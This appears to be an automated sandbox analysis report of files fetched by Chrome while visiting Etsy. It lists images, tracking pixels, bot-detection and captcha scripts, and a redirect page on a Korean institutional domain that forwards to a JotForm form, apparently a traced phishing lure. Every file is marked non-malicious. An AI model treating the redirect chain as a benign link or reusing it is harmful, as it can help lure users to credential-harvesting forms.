                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:91E633164FDA236DA5DEEB9915A298A2
                                                                                                                                                                SHA1:B00F483F9A9795F7677B473E61B548564EBEAF8C
                                                                                                                                                                SHA-256:9559F45AA73A10A4CF7A3CE8C0D3F917AF2469F2A10DEC63108575FEAE280AB0
                                                                                                                                                                SHA-512:6B755264B52E3A291D53A21A80C43B6388FDC60E4609A443B0146353293DAE8ECF0870F0B2C11456201D03E9E7F3CBA4E5BEC13B0CCADC126AEEC5061838792A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/17719287/r/il/411e0a/2504474000/il_680x540.2504474000_3nqj.jpg
                                                                                                                                                                Preview:RIFF@...WEBPVP8 4....}...*....>E".E".!#....p..gl.59.bO..5iu...|..O86..,........9....<.z......3.k....D..........I.M.[....3.. ....<.}+....C..._.o...w..G......#.....?O..^.~_........`o...}_....'..`........esT..<w/...........V..O..f1..v.<nS..u.;h."..t+.........1.n....)..n.b.>x3.h_.{..M.k..$........C..R..=.0[.y6.n[..C.W..JsJ....A.....8......N........|.....m.)..v..g[.2.Np..q).G3..7S.../..l@W./=..i..`l.l..(;.&U........t.v..u..z...........q..h.t.:.a)I&T..3^.[~.c.y.p..%......5.p..*.lw:.T...;...$...K..^.0D..Z....MU...j.?..RWB2....#..F........,..G"p.Sz....cJ..,c.*.l]..h.e...Nu.Ogi.WBR.....4t.5..@.l.YZ.^..d......zj.4<fz.........=H...G.O.p@..s..:).IsA.h<f+.6.y?v ;.<...t.9R...t...:..[....,`....G..j...o....mD....y..5..s.=v:.............W....(.p.2....*7.M....ER.......Ai.b.l.F...X..].~..q..M.T(..]0..).p.k..;WcZ"..]...@.....a.0..e....U.xrL.@.y...*.z.;....i ....J.s<..Q^..=4.U.]j\../.e@...w...]....j!.f.h.....;j.....,..E;f...\..F.j.^.(..n.y.....9\*..Iic.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65431)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):172574
                                                                                                                                                                Entropy (8bit):4.417119215397353
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:AEA4A287E673A3D42A67E1206F77B4CF
                                                                                                                                                                SHA1:8E7670AFA27599784C59EB2C91A1AD73B579259D
                                                                                                                                                                SHA-256:474AA5E80D520F2630E0CBCE859C3D8C3922305B41B290E28AFADBD2DF15EC28
                                                                                                                                                                SHA-512:9B8257A52F8445C46AEAFBDDFC7E929358F969D71BA9BE31CFFE2F651B2E02223550A53DACD684A9108E3287E53C058AB3EE8991D0F0B3835CF970ED9000DE3B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:/** DataDome is a cybersecurity solution to detect bot activity https://datadome.co (version 4.35.3) */ .!function e(t,n,o){function i(r,s){if(!n[r]){if(!t[r]){var d='\x66\x75\x6e\x63\x74\x69\x6f\x6e'==typeof require&&require;if(!s&&d)return d(r,!0);if(a)return a(r,!0);var c=new Error('\x43\x61\x6e\x6e\x6f\x74\x20\x66\x69\x6e\x64\x20\x6d\x6f\x64\x75\x6c\x65\x20\x27'+r+'\x27');throw c[['\x63\x6f\x64\x65']]='\x4d\x4f\x44\x55\x4c\x45\x5f\x4e\x4f\x54\x5f\x46\x4f\x55\x4e\x44',c;}var l=n[r]={exports:{}};t[r][0][['\x63\x61\x6c\x6c']](l[['\x65\x78\x70\x6f\x72\x74\x73']],function(e){return i(t[r][1][e]||e);},l,l[['\x65\x78\x70\x6f\x72\x74\x73']],e,t,n,o);}return n[r][['\x65\x78\x70\x6f\x72\x74\x73']];}for(var a='\x66\x75\x6e\x63\x74\x69\x6f\x6e'==typeof require&&require,r=0;r<o[['\x6c\x65\x6e\x67\x74\x68']];r++)i(o[r]);return i;}({1:[function(e,t,n){t[['\x65\x78\x70\x6f\x72\x74\x73']]=function(){this[['\x65\x6e\x64\x70\x6f\x69\x6e\x74']]='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2d\x6a\x73
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (1076), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):1076
                                                                                                                                                                Entropy (8bit):5.6342768684782
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1D6E61F71DEC10723EA154F990362DCA
                                                                                                                                                                SHA1:FCFB1D9B6D80712941F74E2A5C60EA8933A0768F
                                                                                                                                                                SHA-256:8F40E7B9538BC630C964C0EAB10CC7264A79A03053C83A5F4E6C6F9EB5437DBB
                                                                                                                                                                SHA-512:D03FFC64689822C7CC592C14286FF54F5B81A703CA4CFF9946E256D51E4AAF019B47AC53F37C32804B3C85BE326132D6103EDF6658D56282C89769031AD9BA94
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://8666735.fls.doubleclick.net/activityi;dc_pre=CNassM2tgokDFe-Dgwcdmg0fOA;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=2111120285.1728513237;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
                                                                                                                                                                Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://pixel.streetmetrics.io/pixel/62f2e71d-3885-4822-ba89-6e017b2f1a1e" width="1" height="1"><img src="https://tags.w55c.net/rs?id=590f83e499a54109bd553d1e2ebaf867&t=marketing" /><img height="1" width="1" style="border-style:none;" alt="" src="//insight.adsrvr.org/track/conv/?adv=r09jr34&ct=0:ezyvggn&fmt=3"/><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CNassM2tgokDFe-Dgwcdmg0fOA;src=8666735;type=count0;cat=etsy_00;ord=1;num=8756467898722;npa=0;auiddc=*;u2=RLMmaTf_kJrAe-ogNvmqp7rV2rK_;ps=1;pcor=646584803;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~1016
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (50522), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):50523
                                                                                                                                                                Entropy (8bit):5.297134171375771
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:14272A6CDF99BDC079B8EC8097889F49
                                                                                                                                                                SHA1:2343F9F1D29F3B034F3B8FFB7A92BFFD98A88450
                                                                                                                                                                SHA-256:73AAA4E6BFC1DBED5F3F934710D1ADA545F4068742235E59D0CB74F0EAF0A3C4
                                                                                                                                                                SHA-512:BD83B900ACBFB123F485F46DE1692710B7C77DE90739CA3CFAB7A58CF3B71FCD9D97FCCEC6762528886C57A41F101574209F65B2BEF745613F0BCB7D196200A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://bat.bing.com/bat.js
                                                                                                                                                                Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):7960
                                                                                                                                                                Entropy (8bit):7.974303426527323
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:AD6B9D77F428FCC6925C754C9831B1EA
                                                                                                                                                                SHA1:FBC7E4E2AAAB6F7DB7C80D5E95EA621A1D4C3FE6
                                                                                                                                                                SHA-256:955071C392B1BD0730C7F622566D9FEB822AF258A8CC0605DAFED3676F6642A0
                                                                                                                                                                SHA-512:C908C449C7D415FD9385B80A62D0FA24302863A0BB6ADA18F2892452AE6FFA0FBF9AAED2A0F6BBE7C5437168A5CF1A1BAD373DBD0A0325E28D1F74A170AA1F9F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/32948796/r/il/0d8179/5971304877/il_300x300.5971304877_d515.jpg
                                                                                                                                                                Preview:RIFF....WEBPVP8 ....P....*,.,.>E .E".!....(.D..!.;..!.j...Q.N^.y...>...(......7.....O./....L_0......=O.x..........O..`o..N.e...=).@?....3.!..z....._]..........+._R..{.~..q.W.{._..........G......?..........r.}.9._..5B.t....h...u..q.ZH../..D.U...W.Z.......y.>.v,E&NZ.q6\>.w..(.....h(...R4....).v........:X..=.,.......o..."A-..+.)........8.A....'.....".r6.iz.]....m..gw....,....v.. .`./........l.L.u..W&..wc..l..l......x3.Ij.Aj+...H.Z...T....@c.#Z..l.2...1..AS.I.{...*=r.....<%.....b....O....<,..j..y...Pi.go..W...9......:.......e..k.z.....35{@w...L...(*..x..`...L`.b..#.... 9'...9..Q.p.=...8..8d[....@>W..............y......V(......o..w......z.}v.)lp....AQ......(\.$.VW.Yo..^.k-...i..q.xViE.)...}...Dx......+..g@C,...=..t.....#.2.@z.CP."3....X.O.W.M..3.O.D..{@_j..g....g....}bQ.....|.`.0F..f...'.m.>......,...-O,..A...f..B...d..4z.pOf.T....`..X...$.L.&|......;O..-\...y..?.........&.<$......O.<.HE+.....8q....4...............H.\J....<....Z.\Ki0....V......#z.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 680x540, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):46530
                                                                                                                                                                Entropy (8bit):7.995945970483044
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F9FE9224E7AFA6828403FF98B086D59A
                                                                                                                                                                SHA1:0C3854A84C6A6C24FB8B325AEC9AFE5D7F525C5D
                                                                                                                                                                SHA-256:8F47B0756F6F314C7CDF02FCBB37CF2107519FD2D2C83C602CD0A813BCF23F1F
                                                                                                                                                                SHA-512:F9340847DB1EA4149DE174022BD10FAA8878823F87D9603B60C1E06E3ABE139CC1276440C011F0F9FDF793934CEFCB41F3431F04B42DC249898428EB4ED81EA7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/17221723/r/il/88445f/3378669165/il_680x540.3378669165_pfbv.jpg
                                                                                                                                                                Preview:RIFF....WEBPVP8 ....P]...*....>E .D..!&&.....gC.......Z2n}..c...Yh.....y.{_}..~...z.s..Q.....W..T...L..]...tA.w.....9./....[.................z.....G........Z...W...'........}.k.O._....w._..........o......I.....>......=...#........F.......`?.?.......s...........>........#....._......g...G....u.......4....%...vj.Y...4P.....UaB...y(\...M.yh..vH.......k.`q....M.>..~..h...V...VA...............o;1c93..4.!*0.....i.D....V..G4.\....!...R..u.{...+S.(3Y.."...k...G.#;..U.....^....i.}9JO.|:....n..@.h_.M.....{.{...K..W?X.}. ..m,.|LV.Q.7..\..&>Z...,.._....B0c.f>*)`.G....U...5Y.p.....)p.H.FK..Zq....l...2.:....,..l.-.s?.e..j.E...[..aW.C.#M8.Y......O$.I.r..i.0.5.../Q......C$...B{..Pf..z.....{E=C*..U....Yz.{X..~..i5QP.0.r}. .m.......Mas.E..yr.hL)....U..g2.|.C.$..5.]t.).<%.^.R.jF0(.S.Nx.O...J.....]Y..n._,.&...F..."...11Q..3..].wij.......j9^d... 5.]......%D..o|Uc..n$.._|u).......-5?}.HEC..Z6.....#bu.......0.s...s..o%....v+M..%.F..5'..y.j.w....i..s]..M.E.....|+..S
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 300x300, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16377
                                                                                                                                                                Entropy (8bit):7.920320460240072
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:67500374743233A1A31411EC252B1151
                                                                                                                                                                SHA1:42714EB5DDA0707EEB5A9C72ACEE436A9EF3F604
                                                                                                                                                                SHA-256:CB608AE4D57D1D29869E58F26B6B65F099C3980E82AC552FEBEAEE464F0C10A1
                                                                                                                                                                SHA-512:D1A06F83F2C5746E97EC5E5081E825DF382703DF63F028DF1826F295BDD615E05761FA37B4CC56ED0BA997EA1ABC5B69B43F38674BE2237720B0B66BE20DD16C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.............................................................&""&0-0>>T.......................................................&""&0-0>>T......,.,.."..........5....................................................................1l.?@..^..:c.O...2.IE...Qf.Ue.QUu.n...7p.B.1.........jt.|?.(S..;.b.^....^......W=?U....DYE.$..*Z9....#&.....i..8......z............3...,....z.MK;nbd...V......r..^O.sKm{..9...]R....-...(o.r..tv... ...p.I.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):10026
                                                                                                                                                                Entropy (8bit):7.982792404707851
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:29BE3006DF7D8ED498D30195F0A17B23
                                                                                                                                                                SHA1:CAE5A94DF2D1CCB0551B02E2A5C71B2BEDA653EF
                                                                                                                                                                SHA-256:1A58B54CF156366A070E0D3E2FFE3D326ECC568F55CADE51D822CB00136B83AE
                                                                                                                                                                SHA-512:DC6734694C9E56FBAEA22D13D7D24B514D31ABA5924A1173CB227D575E8969135ADFB16C19108B6AB3212DE383D55745D433171EC3828BBE9B95A047DBFFB34E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/ij/77c16c/6311775806/ij_300x300.6311775806_qr819rhu.jpg?version=0
                                                                                                                                                                Preview:RIFF"'..WEBPVP8 .'.......*,.,.>=..D"!..I.. ...n.........r5.,.j.._S.o... .....\Q._._..../.....S.>..z.a................[.....\.J".B..PH....:...6.x..q...Z.y......b.`@....>..l.../.....d.u.mx.o...p./.!..X..|.;U>-.mE......Qt....sx0mx...Q..,]E.....vr$....r.7....,..y.|..8H. .....?0T..$=.K... .....7..m4q|)$.,.]......~......E.....zzo.Z.C.Xk....N.7......uf...9....8B..*].....K\.....Y..l.}...n.X...rg....F*..aEFH...J.A...8...?..0...o..avT|..Ih...'.6.w.H..AE..t.U...*....?.x.t_.(...........ao...........d.[.h.......;.R....T....Q.V.j1v...N...oy.8_jG...g.. .@.O.(k..........6H..2k..$<.l...9S..y.t..0...q~.....Q.$....8...Rd....44....b;6>....8%..Z.....- ....l.~.o....o...-r..."..hq..E.q#.a..Z .6p*.R_.y..A...(.`!..`.`.j4#'I.....<.....=.'x...k..F.dK[.t]......^.?..Qo.a...9.........n...........Z.....HPk...n...=.J....LZt}...+.1.v:z.u..V...;.f....-....0^5...|F..y..Q.KA.s...X4...8.. *..E#.1a....V.......S.CX....h.\.i..q..L..........9..Bt...Y.....0.u/..s....7v
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):492
                                                                                                                                                                Entropy (8bit):4.287429819926425
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C211B87CA155CF0B9EDF9299FC3A6841
                                                                                                                                                                SHA1:6B3F78DA95D7CEF287EAC895BA84B41AF5E6CBFB
                                                                                                                                                                SHA-256:7AA5C0E017FF5CC02CEEA5360E907305C94175E5D0DB193077103F241E274C53
                                                                                                                                                                SHA-512:6516E26633512DA38E9B41F83F8BF7E67EA0B6DDBF479889ED32B58983226AF603D5C1283D3381B33FDA21A902AD2CA37BAD6A4FEFBC22644303A92815317D02
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/site.webmanifest
                                                                                                                                                                Preview:{. "name": "Etsy",. "short_name": "Etsy",. "icons": [. {. "src": "/images/android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "/images/android-chrome-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "theme_color": "#ffffff",. "background_color": "#ffffff",. "start_url": "/?utm_source=installed_pwa",. "display": "browser".}.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.425541913001381
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F18B79E62C5C06BBFE462A21F2BBF26D
                                                                                                                                                                SHA1:C2AEDCF6EF15CE94A169A06E532043A0B41C7DB6
                                                                                                                                                                SHA-256:E1205F89C1ED53E95C9077A523FC996C7E3BF7B8B4B4EBED91BB1ACB88586836
                                                                                                                                                                SHA-512:347BBE4F566408DAB1067963BE6B2B6ADDEDAAB3FF17F73521D7BD7352BD5E8F24719557F4BD7792363334637E381B1E592AB7CBCF2A2F000D3025B41B8442A1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052
                                                                                                                                                                Preview:....<html><head>....<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />....<title>Redirect Direct Link...</title>....</head>....<body bgcolor="#ffffff">.... 2011.01.14 .. -->....<SCRIPT type="text/javascript">.... ....var gourl = "https://form.jotform.com/242704649007052";....gourl = gourl.replace(/&amp;/gi, '&');....if (/MSIE/.test(navigator.userAgent)){..// IE. .......var referLink = document.createElement('a');.....referLink.href = gourl;.....document.body.appendChild(referLink);.....referLink.click();....} else {.// .. Browser.....location.href = gourl;....}....//-->....</SCRIPT>....</body>....</html>....
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 340x270, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13932
                                                                                                                                                                Entropy (8bit):7.963842571129259
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:A8F05A345154AEB46E63814E9F029429
                                                                                                                                                                SHA1:FFCA375CDB890B8D34A6C162DCF797DA7F10E535
                                                                                                                                                                SHA-256:7EB430496A8934DEB2F1A8002B4312DDB6DA1045F52A0684E2EFEAAEA42EEBC2
                                                                                                                                                                SHA-512:498EFF48BF245AA8F405604ECF17617BAB14A3C58F3C4CFACEB3AD5F3218A02510E269CED263D25A75C600995E636D983BD09EFCD6D084CA0953745FBCD9481C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.........................................................................&$&22C...........................................................&$&22C........T.."..........5...................................................................\.......%..I.2.......Ki.U..6..).eY.-......[...[.(..'".;...6..H.\i.e;.A.."$t. S.S;.4.R#.W..#5.....o.9..jj.C.2..4f. .=.Jy.7Jj...).!W...*...'8..V....n.h...K.MUM..!.f....;...*.......Z....-q3.H......XZK.$rx!..H..J..|..t..x..zBp..h.<7.?.5eS...... .CM5......=.N..y5I..xf6.l.%S.....e..J>.#...`&@.IK.B.`m..B....3.Yf.....U9.#.W%.5A.ZW1...h..*X..j..>.u..,t..?>..c....`..IDjsh.%....... .A.JBh..)I~-l4.y.H...c6..~.b.H.}..TzW.3S4/Mg..j.~...,.Ej...Jk2.V.".-.G....1}D.................B..5.-d..M.`O....,.3.5}.k$....d.......D..h.m@0...".^.Z....P....3..)s..N..C.......i..r<d.YQ..<..-.pG.....I.6..ul.np5.....gk/(.^.w..k1d.....=..6^^.U73.U.......~NW..c.t.."-:.m.)_h...o;`9..yoo.:..%-).J......6.u...Z..^..y.u..'......k........1...DTG.....~m
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 288 x 288, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):2730
                                                                                                                                                                Entropy (8bit):7.730533261355917
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E96D6D1A961EDF8BE5EE4FA412C544BD
                                                                                                                                                                SHA1:C2D674B60F77264A36858C38DCBDD23945B04858
                                                                                                                                                                SHA-256:91F0CDDB15EE1B44A0725364389847EC7B52294A4162C7489C26D426CEAAF4E6
                                                                                                                                                                SHA-512:6728AAB5474AC9ED940AE1847C7269D95313F26BF339A6F23B9430D408A6215F459E603F025D92042C3F8DFDD7BCDC2D8EC23F24D7F640B8E09C3559E4943094
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-light%402x.png
                                                                                                                                                                Preview:.PNG........IHDR... ... .....#]^.....PLTE...........)..(..P.`..a..a.....`..`......)..*.a..b..a.....a...........`..`...(..P..R.....(..).`......Q.....Q..... ....`......(..(.....P..).....(..(..P..Q..)....a...Q..Q..).a...P..)..)..)..)..P..*....`..b..`...P..0.....P.....(.a..`...(..)..).a......)..Q;._....PtRNS.. . . ....00..._..._.0` .@@.@.b`..pp.pPP...._0...........@..PO......?..G-b.....IDATx...n.0...K. .t...&..!.6T6i.........f...fY?(-.......?.O.9..@.......e..n..Z.=5.....#....[_&4>..7.K,gZ.e..........Y@5.8R.0...V..To..c.%.j..ud..B....B....>[U.'"..o.U.....O..P.V><...~.7........d....D.^By.....|._.g.}.Y(..4..{,..1..1-..n..#.(S.....m.~......~......v8..!...B......Xs...5.".Z...d.....5:.....@...c...c..y%.l$B|....B/..xt|......5..E.G....E..@b.|dK.!..B..H...Y. >Z>..>....#...].f.|.4..us(o.9....7<........a=r>.bw....E.G......*.>N.>.......}...>.>...s.....s......K....m..4..d..Y..<...._u.>....{....c..3....]z>~.OT...\....j>#.>.}.<R>...u.X9..]_.'..}R..'..}R.....>x=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (559)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):1186
                                                                                                                                                                Entropy (8bit):5.541899129217321
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:87E26DFCE2EF9BB17AC89F8048C036AF
                                                                                                                                                                SHA1:9A256749ACB38A844E998FED444DEAA3A7C9E0D3
                                                                                                                                                                SHA-256:94B5DC8DCD9C29BEEB504D522F8603914B54DF452DE3B4E1BE81F4404E3E3D6B
                                                                                                                                                                SHA-512:A11EA6EC3EB1A26431981C5651CEF3DC825FBBA10F5A8FD62F66A3CDA4C4E6968126F2EF76F8B4B9A335E9BB5F1F23C9820FA0B0F74BD3CBB1460B1158502C8B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://8666735.fls.doubleclick.net/activityi;dc_pre=CJv_sM2tgokDFXGMgwcdG1UmsA;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=2111120285.1728513237;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4a70v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101529666~101671035~101686685~101747727;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
                                                                                                                                                                Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script src="https://js.adsrvr.org/up_loader.1.1.0.js" type="text/javascript"></script>. <script type="text/javascript">. ttd_dom_ready( function() {. if (typeof TTDUniversalPixelApi === 'function') {. var universalPixelApi = new TTDUniversalPixelApi();. universalPixelApi.init("r09jr34", ["c6e9qnb"], "https://insight.adsrvr.org/track/up");. }. });. </script><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CJv_sM2tgokDFXGMgwcdG1UmsA;src=8666735;type=count0;cat=etsy_000;ord=1;num=3043274380888;npa=0;auiddc=*;ps=1;pcor=742816089;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;g
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):150357
                                                                                                                                                                Entropy (8bit):5.40513258416899
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:E6C1BF71E02CFBE1D8B39F3D11CD7B09
                                                                                                                                                                SHA1:9F332E9E209FB6FBC799CAC9EF76DE35A2E17CF4
                                                                                                                                                                SHA-256:B141867B06A062C3EF734B8600EB74821D6E80665790B9D306037F33976AD660
                                                                                                                                                                SHA-512:796821E92FE3D84C83EBE3ACC1841CC858A0B808B486A0E7AB78AA6FCF05344A60BC41D25E2EB4E39487D74530025B207C1AF749B12F152E007E9C14ECAE0744
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
